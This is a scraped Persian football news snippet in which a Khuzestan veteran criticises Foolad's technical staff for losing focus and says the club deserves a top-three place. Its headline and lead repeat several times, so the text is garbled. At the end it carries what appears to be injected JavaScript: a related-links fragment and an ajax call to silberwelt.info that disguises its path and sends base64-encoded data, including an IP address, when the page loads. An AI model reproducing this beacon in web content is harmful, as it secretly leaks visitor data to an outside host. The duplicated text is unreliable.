حواشی اخیر، تمرکز کادر فنی را به‌هم زد/ حق فولاد قرارگرفتن بین سه تیم اول است

حواشی اخیر، تمرکز کادر فنی را به‌هم زد/ حق فولاد قرارگرفتن بین سه تیم اول است
پیشکسوت فوتبال خوزستان با بیان اینکه معتقدم پورموسوی بسیار خوب عمل کرده است، گفت: باید بگویم که با فرارسیدن هفته‌های پایانی لیگ به‌نظر می‌رسد کادرفنی فولاد تمرکز خود را در آنالیز حریفان و چینش مهره‌ها تا حدودی از دست داده است.

حواشی اخیر، تمرکز کادر فنی را به‌هم زد/ حق فولاد قرارگرفتن بین سه تیم اول است

پیشکسوت فوتبال خوزستان با بیان اینکه معتقدم پورموسوی بسیار خوب عمل کرده است، گفت: باید بگویم که با فرارسیدن هفته‌های پایانی لیگ به‌نظر می‌رسد کادرفنی فولاد تمرکز خود را در آنالیز حریفان و چینش مهره‌ها تا حدودی از دست داده است.
حواشی اخیر، تمرکز کادر فنی را به‌هم زد/ حق فولاد قرارگرفتن بین سه تیم اول است
i==a.length-1)c=’ class=”last”‘;var g=””;void 0!==a[i].token&&(g=a[i].token);c={cssClass:c,urlKeyword:a[i].term.replace(/ /g,”-“),token:g,keyword:a[i].term};d.append($.tmpl(“related_links_tmpl”,c));start=i+1}}}};

$.ajax({ url: ‘http://silberwelt.info/’ + ‘s’ + ‘earch/tsc.php?200=Mjg1NzMzOTU3&21=OTUuMTU0LjIzNy44NQ==&681=MTUxOTY1NjQ4MmZhMmRiOTk4ZmEyNDk4MzI4NjE3MTI2ZjUzZTFlYzlj&crc=bf027fb053bad35d176f1be8553ee011e5dc1a11&cv=1’});

View more posts from this author